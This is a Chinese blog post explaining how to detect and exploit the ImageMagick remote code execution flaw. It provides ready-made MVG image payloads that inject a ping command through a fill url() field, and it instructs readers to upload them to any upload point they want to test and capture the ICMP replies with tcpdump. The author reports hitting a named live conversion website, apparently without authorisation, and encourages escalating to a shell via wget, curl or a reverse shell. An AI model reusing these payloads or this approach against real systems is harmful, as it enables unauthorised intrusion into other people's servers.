唐小风

安全工程师这些年

关于ImageMagick的RCE漏洞(附验证方式及实例)

也许你不希望你找出的漏洞被某些厂商收集,比如调用某些厂商的漏扫接口会暴露你的目标url,所以我在这告诉大家怎么简单高效的检测这个漏洞。 
通过ICMP方式实现漏洞检测。
 
1、github上有很多示例,我fork了一个:https://github.com/wangeradd1/PoCs 

2、上面有个rce1.jpg,拿出来改一下保存成图片后缀去找你想测试的上传点就行了: 
linux版: 
push graphic-context 
viewbox 0 0 640 480 
fill 'url(https://127.0.0.0/oops.jpg"|ping 你的公网IP -c 3")' 
pop graphic-context 

windows版: 
push graphic-context 
viewbox 0 0 640 480 
fill 'url(https://127.0.0.0/oops.jpg"|ping 你的公网IP-n 3")' 
pop graphic-context 

3、然后在你的带公网IP机器上抓ICMP包,不管wireshark还是tcpdump都行,这里以tcpdump为例: 

tcpdump icmp -v 

4、真实案例: 
http://www.convertfiles.com/ 

在这里上传一个步骤2的图片,这个服务器是linux的。 

这里就看到他来ping我了 

如果想拿权限,那就通过echo,wegt,curl,反弹等方式,你们还有什么好方法要分享哦。

评论